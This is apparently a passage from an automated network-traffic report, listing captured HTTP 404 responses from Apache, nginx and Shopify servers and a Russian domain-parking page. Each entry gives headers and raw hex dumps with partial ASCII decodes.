            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:46 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912server-timing: processing;dur=14content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sXh2KeFPggnvWIuk4DuHrhCdvCizRRXVrZEHB9oeJ9mwData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: a465852f-406c-4919-a086-9337ee5c2b6a-1717948915server-timing: processing;dur=10content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a465852f-406c-4919-a086-9337ee5c2b6a-1717948915x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a465852f-406c-4919-a086-9337ee5c2b6a-1717948915x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQfET4ahT70%2B6CXmzMiQ0YdI2xhMj5Qte%2BlNtaPbWData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918server-timing: processing;dur=16content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cd9AGpCCqtgQRFCV1u0V2XfpVVbjuAUBO0%2B%2FLFhYxData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 09 Jun 2024 16:03:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 e2 d9 b5 63 d6 91 2d c7 eb f8 5b 66 14 48 7b 63 95 1b 5c f0 65 47 34 c4 fa d0 b3 23 c7 f7 2a d5 ab d7 97 8f 58 c7 2e 5d 6a 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 d9 c3 54 ca 56 5f 7a ce ba 0a 23 f3 72 58 ae 96 d0 5e 05 81 1f 1c b2 43 4d 2c a1 4f 18 d8 8d 52 71 20 d8 23 b3 ef 30 5a 67 fb 3e b3 5c 04 16 98 8c 34 12 1e 5a b6 e9 4e 45 f9 a6 ea 0e 92 d1 d2 48 6d fb 9d 51 86 e9 b6 31 80 ad 84 fe d7 22 f3 b5 52 9c 72 19 23 76 fc a9 d5 ee b6 5c a7 db 8b 80 07 1a 4b 05 c5 71 b8 71 ab 95 56 d0 90 13 25 7a f4 14 ed 1d 67 73 6e 57 c3 f3 23 12 29 52 57 30 51 fc 4d bc 17 3f 8a 77 e2 c7 22 fe 2e be 93 7c 80 8f f7 e2 dd e4 c3 e4 06 3e ef e2 77 2f de 8e ef 50 f5 f6 82 d7 0e 07 cb 75 f8 a1 f6 d8 b6 41 a8 cd b0 da 8b a2 41 78 c6 b2 e0 76 26 1c 57 3b 83 e7 af fb ae eb 6f 09 cf f7 07 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d 72 e7 56 1b fe be 01 61 fe 46 b3 9b c9 07 c9 cd ba 25 9b 75 0b eb 68 d6 a7 16 d3 55 ad 56 ea e3 c6 56 20 07 03 0c 9a 2a 78 ba bc c5 be d8 82 2f 80 10 e6 36 62 b3 f4 fc 30 02 7d 18 61 24 23 c7 86 01 a6 66 9d d0 b5 91 ce 4f 76 5a 1a 6b 63 ca 22 06 53 43 69 1f 63 f4 96 9a f5 c1 fc 5e 1d a5 f1 0b 27 7d 76 2b d5 db 41 33 de d5 86 8a 9f 90 05 e3 27 6c d5 07 fb ec 38 a1 ec c1 bc 05 b7 87 51 e4 7b 61 a6 69 ac b8 60 7e 5d 09 29 f5 07 a8 df f5 83 16 db 57 79 36 81 2c ad 08 9d f7 55 0b 96 ef 4b 97 cd 90 6a 33 ef 9f 6b 2e 6d cf 26 01 0f 17 86 18 c8 4e 07 06 6a b9 84 99 69 cc 11 29 6b dc 59 5b 3d df 09 ad 15 bb a7 ec 8d c6 42 87 83 c3 24 67 2f c8 fe 60 19 ad 5b a1 3f 0c 6c d5 c8 26 27 36 2e 35 7f 43 fd 09 7d a2 b8 52 72 96 a2 e4 4c d7 05 1f 3c 78 25 1d bf 2f 9d 9c d4 33 47 29 08 ad 1b 58 9e da b2 56 86 51 3f 93 6c 4a 6e aa a1 88 32 ec 67 32 2f 50 91 8d f5 48 a7 eb 35 42 28 c7 eb b4 30 ca c1 4b 8c ff 01 30 fc 37 de 11 c9 c7 f1 5e f2 69 72 53 c4 f7 33 16 38 5a 70 3c 44 38 6f 06 4e 07 81 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 09 Jun 2024 16:03:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 e2 d9 b5 63 d6 91 2d c7 eb f8 5b 66 14 48 7b 63 95 1b 5c f0 65 47 34 c4 fa d0 b3 23 c7 f7 2a d5 ab d7 97 8f 58 c7 2e 5d 6a 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 d9 c3 54 ca 56 5f 7a ce ba 0a 23 f3 72 58 ae 96 d0 5e 05 81 1f 1c b2 43 4d 2c a1 4f 18 d8 8d 52 71 20 d8 23 b3 ef 30 5a 67 fb 3e b3 5c 04 16 98 8c 34 12 1e 5a b6 e9 4e 45 f9 a6 ea 0e 92 d1 d2 48 6d fb 9d 51 86 e9 b6 31 80 ad 84 fe d7 22 f3 b5 52 9c 72 19 23 76 fc a9 d5 ee b6 5c a7 db 8b 80 07 1a 4b 05 c5 71 b8 71 ab 95 56 d0 90 13 25 7a f4 14 ed 1d 67 73 6e 57 c3 f3 23 12 29 52 57 30 51 fc 4d bc 17 3f 8a 77 e2 c7 22 fe 2e be 93 7c 80 8f f7 e2 dd e4 c3 e4 06 3e ef e2 77 2f de 8e ef 50 f5 f6 82 d7 0e 07 cb 75 f8 a1 f6 d8 b6 41 a8 cd b0 da 8b a2 41 78 c6 b2 e0 76 26 1c 57 3b 83 e7 af fb ae eb 6f 09 cf f7 07 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d 72 e7 56 1b fe be 01 61 fe 46 b3 9b c9 07 c9 cd ba 25 9b 75 0b eb 68 d6 a7 16 d3 55 ad 56 ea e3 c6 56 20 07 03 0c 9a 2a 78 ba bc c5 be d8 82 2f 80 10 e6 36 62 b3 f4 fc 30 02 7d 18 61 24 23 c7 86 01 a6 66 9d d0 b5 91 ce 4f 76 5a 1a 6b 63 ca 22 06 53 43 69 1f 63 f4 96 9a f5 c1 fc 5e 1d a5 f1 0b 27 7d 76 2b d5 db 41 33 de d5 86 8a 9f 90 05 e3 27 6c d5 07 fb ec 38 a1 ec c1 bc 05 b7 87 51 e4 7b 61 a6 69 ac b8 60 7e 5d 09 29 f5 07 a8 df f5 83 16 db 57 79 36 81 2c ad 08 9d f7 55 0b 96 ef 4b 97 cd 90 6a 33 ef 9f 6b 2e 6d cf 26 01 0f 17 86 18 c8 4e 07 06 6a b9 84 99 69 cc 11 29 6b dc 59 5b 3d df 09 ad 15 bb a7 ec 8d c6 42 87 83 c3 24 67 2f c8 fe 60 19 ad 5b a1 3f 0c 6c d5 c8 26 27 36 2e 35 7f 43 fd 09 7d a2 b8 52 72 96 a2 e4 4c d7 05 1f 3c 78 25 1d bf 2f 9d 9c d4 33 47 29 08 ad 1b 58 9e da b2 56 86 51 3f 93 6c 4a 6e aa a1 88 32 ec 67 32 2f 50 91 8d f5 48 a7 eb 35 42 28 c7 eb b4 30 ca c1 4b 8c ff 01 30 fc 37 de 11 c9 c7 f1 5e f2 69 72 53 c4 f7 33 16 38 5a 70 3c 44 38 6f 06 4e 07 81 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 09 Jun 2024 16:03:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 e2 d9 b5 63 d6 91 2d c7 eb f8 5b 66 14 48 7b 63 95 1b 5c f0 65 47 34 c4 fa d0 b3 23 c7 f7 2a d5 ab d7 97 8f 58 c7 2e 5d 6a 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 d9 c3 54 ca 56 5f 7a ce ba 0a 23 f3 72 58 ae 96 d0 5e 05 81 1f 1c b2 43 4d 2c a1 4f 18 d8 8d 52 71 20 d8 23 b3 ef 30 5a 67 fb 3e b3 5c 04 16 98 8c 34 12 1e 5a b6 e9 4e 45 f9 a6 ea 0e 92 d1 d2 48 6d fb 9d 51 86 e9 b6 31 80 ad 84 fe d7 22 f3 b5 52 9c 72 19 23 76 fc a9 d5 ee b6 5c a7 db 8b 80 07 1a 4b 05 c5 71 b8 71 ab 95 56 d0 90 13 25 7a f4 14 ed 1d 67 73 6e 57 c3 f3 23 12 29 52 57 30 51 fc 4d bc 17 3f 8a 77 e2 c7 22 fe 2e be 93 7c 80 8f f7 e2 dd e4 c3 e4 06 3e ef e2 77 2f de 8e ef 50 f5 f6 82 d7 0e 07 cb 75 f8 a1 f6 d8 b6 41 a8 cd b0 da 8b a2 41 78 c6 b2 e0 76 26 1c 57 3b 83 e7 af fb ae eb 6f 09 cf f7 07 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d 72 e7 56 1b fe be 01 61 fe 46 b3 9b c9 07 c9 cd ba 25 9b 75 0b eb 68 d6 a7 16 d3 55 ad 56 ea e3 c6 56 20 07 03 0c 9a 2a 78 ba bc c5 be d8 82 2f 80 10 e6 36 62 b3 f4 fc 30 02 7d 18 61 24 23 c7 86 01 a6 66 9d d0 b5 91 ce 4f 76 5a 1a 6b 63 ca 22 06 53 43 69 1f 63 f4 96 9a f5 c1 fc 5e 1d a5 f1 0b 27 7d 76 2b d5 db 41 33 de d5 86 8a 9f 90 05 e3 27 6c d5 07 fb ec 38 a1 ec c1 bc 05 b7 87 51 e4 7b 61 a6 69 ac b8 60 7e 5d 09 29 f5 07 a8 df f5 83 16 db 57 79 36 81 2c ad 08 9d f7 55 0b 96 ef 4b 97 cd 90 6a 33 ef 9f 6b 2e 6d cf 26 01 0f 17 86 18 c8 4e 07 06 6a b9 84 99 69 cc 11 29 6b dc 59 5b 3d df 09 ad 15 bb a7 ec 8d c6 42 87 83 c3 24 67 2f c8 fe 60 19 ad 5b a1 3f 0c 6c d5 c8 26 27 36 2e 35 7f 43 fd 09 7d a2 b8 52 72 96 a2 e4 4c d7 05 1f 3c 78 25 1d bf 2f 9d 9c d4 33 47 29 08 ad 1b 58 9e da b2 56 86 51 3f 93 6c 4a 6e aa a1 88 32 ec 67 32 2f 50 91 8d f5 48 a7 eb 35 42 28 c7 eb b4 30 ca c1 4b 8c ff 01 30 fc 37 de 11 c9 c7 f1 5e f2 69 72 53 c4 f7 33 16 38 5a 70 3c 44 38 6f 06 4e 07 81 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 09 Jun 2024 16:03:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 09 Jun 2024 16:03:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
